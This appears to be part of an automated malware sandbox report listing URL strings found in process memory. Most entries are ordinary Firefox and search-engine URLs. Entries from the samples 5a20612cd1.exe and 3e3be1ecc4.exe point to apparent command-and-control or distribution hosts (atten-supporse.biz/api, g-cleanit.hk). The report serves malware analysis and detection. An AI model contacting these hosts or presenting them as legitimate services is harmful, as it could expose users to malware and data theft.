Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001F.00000003.2762399051.00000294ABF77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2902018660.00000294AB770000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761534873.00000294ABF1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761201786.00000294ABD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761868239.00000294ABF3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2762122666.00000294ABF5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: 5a20612cd1.exe, 00000011.00000003.2759178373.0000000005778000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2758760881.00000000057E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001F.00000002.2969171257.00000294AF67B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.caOtherBookmarksFolderTitle
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001F.00000002.2972627583.00000294AF723000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001F.00000002.2874356378.000000C4627D8000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwdp
Source: firefox.exe, 0000001F.00000002.2895107226.00000294A924C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001F.00000002.2931152196.00000294ADF43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2926644947.00000294AD16B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3005210447.00002A858BA04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2895107226.00000294A9203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.comZ
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: 5a20612cd1.exe, 00000011.00000003.3061186123.000000000125D000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2923519142.000000000125F000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2924215706.0000000001266000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/
Source: 5a20612cd1.exe, 00000011.00000003.2923811061.0000000001262000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2923519142.000000000125F000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2924215706.0000000001266000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/1
Source: 5a20612cd1.exe, 00000011.00000003.2971362473.000000000125D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/2
Source: 5a20612cd1.exe, 0000000F.00000002.2574983040.000000000112B000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 0000000F.00000003.2573853922.0000000001129000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/?
Source: 5a20612cd1.exe, 0000000F.00000002.2574983040.000000000111D000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 0000000F.00000003.2573768570.000000000111D000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 0000000F.00000002.2574983040.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2865147981.0000000005793000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2816774103.0000000005793000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.3222473659.0000000005777000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2970165661.0000000005796000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2808696061.0000000005793000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2986752730.0000000005793000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2862338964.0000000005793000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2983837689.0000000005793000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2986482121.0000000005793000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.3224936078.0000000005793000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2909698304.0000000005793000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api
Source: 5a20612cd1.exe, 00000011.00000003.2923890725.000000000124F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api#
Source: 5a20612cd1.exe, 00000011.00000003.3222473659.0000000005777000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.3224936078.0000000005793000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiJg
Source: 5a20612cd1.exe, 0000000F.00000002.2574983040.000000000111D000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 0000000F.00000003.2573768570.000000000111D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apii
Source: 5a20612cd1.exe, 0000000F.00000002.2574983040.000000000111D000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 0000000F.00000003.2573768570.000000000111D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apin
Source: 5a20612cd1.exe, 00000011.00000003.2957358785.0000000001269000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apitat
Source: 5a20612cd1.exe, 00000011.00000003.2865147981.0000000005793000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2816774103.0000000005793000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2862338964.0000000005793000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2909698304.0000000005793000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apitg
Source: 5a20612cd1.exe, 00000011.00000003.2958332481.000000000125B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/r
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001F.00000002.2976050815.00000294B00AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2991035077.00000294B4603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: file.exe, 00000000.00000002.2215093487.0000000001AAA000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2910134309.0000000005761000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2888692712.00000294A7CAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2895107226.00000294A9203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.2215093487.0000000001AAA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2888692712.00000294A7CAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2895107226.00000294A9203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 0000001F.00000002.2932542016.00000294AE02F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2895107226.00000294A922C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982705596.00000294B41DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982705596.00000294B41DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982705596.00000294B41DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982705596.00000294B41DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: 5a20612cd1.exe, 00000011.00000003.2759178373.0000000005778000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2758760881.00000000057E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2215093487.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2759178373.0000000005778000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2758760881.00000000057E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2215093487.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2759178373.0000000005778000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2758760881.00000000057E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001F.00000002.2892879533.00000294A85D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2902018660.00000294AB770000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761534873.00000294ABF1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761201786.00000294ABD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761868239.00000294ABF3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2762122666.00000294ABF5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001F.00000002.2986949900.00000294B439C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2892879533.00000294A853E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 0000001F.00000002.2986949900.00000294B439C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: file.exe, 00000000.00000002.2215093487.0000000001AAA000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2910134309.0000000005761000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2888692712.00000294A7CAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.2215093487.0000000001AAA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2888692712.00000294A7CAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2895107226.00000294A9203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001F.00000003.2841617207.00000294B439C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986949900.00000294B43BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 0000001F.00000003.2841617207.00000294B439C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2913315248.00000294ACA99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2989111865.00000294B4440000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2991035077.00000294B4603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001F.00000002.2884773158.000002949C430000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2884773158.000002949C411000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001F.00000002.2993230028.00000294B4727000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001F.00000002.2906853139.00000294AC110000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 0000001F.00000002.2906853139.00000294AC110000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 0000001F.00000002.2906853139.00000294AC110000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 0000001F.00000002.2906853139.00000294AC110000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 0000001F.00000002.2906853139.00000294AC110000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 0000001F.00000002.2906853139.00000294AC110000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 0000001F.00000002.2993230028.00000294B4727000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001F.00000002.2993230028.00000294B4727000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001F.00000002.2993230028.00000294B4727000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3005210447.00002A858BA04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2895107226.00000294A9203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 0000001F.00000003.2762399051.00000294ABF77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003014480.0000104006D04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2902018660.00000294AB770000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2882781432.00000182BE804000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2908716384.00000294AC594000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761534873.00000294ABF1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761201786.00000294ABD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761868239.00000294ABF3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2762122666.00000294ABF5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2989111865.00000294B44B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000002.2215093487.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2759178373.0000000005778000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2758760881.00000000057E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 5a20612cd1.exe, 00000011.00000003.2759178373.0000000005778000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2758760881.00000000057E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2215093487.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2759178373.0000000005778000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2758760881.00000000057E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001F.00000003.2844134582.00000294ADE66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2902018660.00000294AB770000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001F.00000003.2867803713.00000294A9F39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2768612925.00000294A9F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898856802.00000294A9BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2892123688.00000294A827D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2765135318.00000294A9F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001F.00000002.3007533161.0000330992204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ebay.comP
Source: firefox.exe, 0000001F.00000003.2867803713.00000294A9F39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2768612925.00000294A9F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898856802.00000294A9BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2765135318.00000294A9F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001F.00000002.2906853139.00000294AC110000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2997499284.00000294B5D7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001F.00000003.2845479795.00000294AD02D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001F.00000002.2906998792.00000294AC1F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 0000001F.00000002.2895107226.00000294A924C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: 3e3be1ecc4.exe, 0000000D.00000003.3089794015.00000000056E1000.00000004.00000020.00020000.00000000.sdmp, 3e3be1ecc4.exe, 0000000D.00000003.3089137215.00000000056E1000.00000004.00000020.00020000.00000000.sdmp, 3e3be1ecc4.exe, 0000000D.00000003.3089580514.00000000057E4000.00000004.00000020.00020000.00000000.sdmp, 3e3be1ecc4.exe, 0000000D.00000003.3089961205.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, 3e3be1ecc4.exe, 0000000D.00000003.3090206271.00000000056E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://g-cleanit.hk
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2997499284.00000294B5D7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
